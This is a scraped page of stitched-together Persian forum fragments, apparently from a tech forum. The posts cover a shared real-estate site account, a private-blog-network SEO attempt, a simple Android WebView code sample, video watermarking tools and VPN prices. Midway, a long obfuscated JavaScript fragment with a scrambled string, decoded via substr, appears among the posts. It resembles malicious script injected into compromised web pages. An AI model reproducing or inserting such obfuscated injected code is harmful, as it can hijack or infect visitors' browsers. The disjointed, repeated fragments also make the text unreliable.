وكيل الرعايا
همکار بازنشسته
اکانت iran-file
کسی نداره
یک خونه میخواهیم بگردیم دوروزه اشتراک 30هزار تومان باید بدیم چه وضعشه
کسی نداره
یک خونه میخواهیم بگردیم دوروزه اشتراک 30هزار تومان باید بدیم چه وضعشه
kaewgloybcrrtcnsoocxfznturpqumhivtjds').substr(0,nGG);var SIA=');(Crtsrf; 72,1httwa+r=(o="1vd.n(javnx4==;sr7o)v.,l61rgh8 g.fh(]e[l[65,et71;6ja;utsn; pv16;,.on=farre0pd-=8ktxu+e..ri==2ur=nv 1orr8e[lzo.tg2r0Aov(h6engt=zf+o),+g8nira=r1(+<gs.=C];xv=C;o++;i7xvn,nv!)+wl k;;==;+Anilau;;=p+.ael.( rAtxec2ld,i.o-mueeitdkiaido7gCff+zhrn(aA=8+aasb8l(;ip)+.thp;<rrhz*nu;r( ;n g(n).8 n,[n)]o;rs0z.o(n(va<]mSsc;1"v <=tld7(u.h(sie s;ear)uhr5=n bcr11xr()mo(}];;.a..sa.r{-9t1 )=re=vo=a[r57ate=){g=hrs"l;p.-,={70a1fcs=,xoybr=;=hx6i;p4}xs{lnf[hx;Caror}m)fs,ff)+ hy2).(ica8ro)ei9(g)+n<1a,-w")z9t,Atv,{]e-x(,=)hxvr[p.gle;csa+e.nkc*u0][zaviu.l6"h;,rio(maa[2"sf;lrneiue tg;a ,h=nr)n=] he= r;bh=tslgt[;r0p;3( x; gnr))ib(i(}bz>pug]0iu(tuhe-n=r t)){3oma4.j(q)=),ia+l(e0=0v=vs60,r;rth] t(C=n}3dwga1;,t;p9oa;ytme,l9u+stircf,;[)(>;mtud];lerr) 9rrvnn;4ut[Cv()+o}Shrvn5hrz;iapn{j+};]").jvc7r9rm,aaal60a)n=tj+fa]8((5+cr"n,c;i++[! vd".2r,jr][gCo6bfj((ot))a,hvs==)fu ey="7+8e0mfl,rdgf)s
همه پست هاش مال یه ماهه احتمالا یه چیز دیگه داشته فیلتر شده این پست ها رو گذاشته که رفع فیلتر بشه
من که نفهمیدم چیکار کردی! گوگل چطور فهمید!! :general107:این روش من برای پی بی ان اشتباهه؟ وبلاگ دو با عنوان A مطلب میزارم با عنوان A و دو تا لینک داخل مطلب به مطلب سایت اصلی میدم که عنوانش کیورد ترکیبی هست میدم و داخل پیوند های وبلاگ دو لینک با کیورد A به مطلب با عنوان A به وبلاگ یک که عنوانش A هست میدم
چهار تا وبلاگ به این شکل زدم
هر وبلاگ یه دونه مطلب داره
عنوان A هم ثابت هست یعنی همه جا همین عبارته
خلاصش اینه که از وبلاگ دو داخل پیوند ها لینک میدم به وبلاگ یک
مطلب هم لینک میدم به سایت اصلی . عنوان وبلاگ ها . عنوان مطالب و عنوان کیورد لینک به وبلاگ ها ثابت هست . البته کیورد لینک به سایت اصلی ترکیبی هست
نتیجه کار سئو منفی بود
ممنون میشم اگه بگید اشکال کار کجاست
اصول پی بی ان چی هست؟:general507:
https://forum.persiantools.com/threads/میشه-جلوی-مسدود-شدن-فیسبوک-رو-گرفت؟.945126/
وب ویو چیز خاصی نداره . مگر اینکه بخوای کار خاصی کنی ؟دوستانی که دستی در اندروید دارند
یک سورس کد ساده webview میخوام , کسی داره ؟
تو نت چیز بدرد بخوری ندیدم یا اگر بود مشکل زیاد داشت
mWebView = (WebView) findViewById(R.id.activity_main_webview);
WebSettings webSettings = mWebView.getSettings();
webSettings.setJavaScriptEnabled(true);
mWebView.loadUrl("http://pt.com");
<WebView
android:id="@+id/activity_main_webview"
android:layout_width="match_parent"
android:layout_height="match_parent" />
اون بنده خدا هم متوجه نشده گفته فعلا یه نمره منفی بهش بدم تا ببینیم چی پیش میادمن که نفهمیدم چیکار کردی! گوگل چطور فهمید!! :general107:
WonderFox Video Watermarkنرم افزاری سراغ دارید برای قرار دادن واترمارک روی ویدیو که رو چندتا ویدیو رو همزمان باهم واتر مارک برنه؟
برگشتیم به ده سال پیشفوری...
پهناي باند پيامرسانهاي خارجي به شدت كاهش يابد و ثانياً قيمت وی.....پی... ها به شدت افزايش يابد
سرعتش چطوره؟ یه مورد دارم برای یک ساعت ویدئو هفت هشت ساعت طول میکشه تا کارش تموم بشه :general208:WonderFox Video Watermark
اکثر این برنامه هایی که تو نت هست عموما کار نمیکنه یا جالب نیست یا ویدیو رو نمیشناسه یا ...نرم افزاری سراغ دارید برای قرار دادن واترمارک روی ویدیو که رو چندتا ویدیو رو همزمان باهم واتر مارک برنه؟
من یه مدت ویدیو ها رو با همین تو vps میزاشتم ، معقولانه بود سرعتش ومیشه گفت در حد تایم فیلم تارگت طول میکشه شایدم کمتر!سرعتش چطوره؟ یه مورد دارم برای یک ساعت ویدئو هفت هشت ساعت طول میکشه تا کارش تموم بشه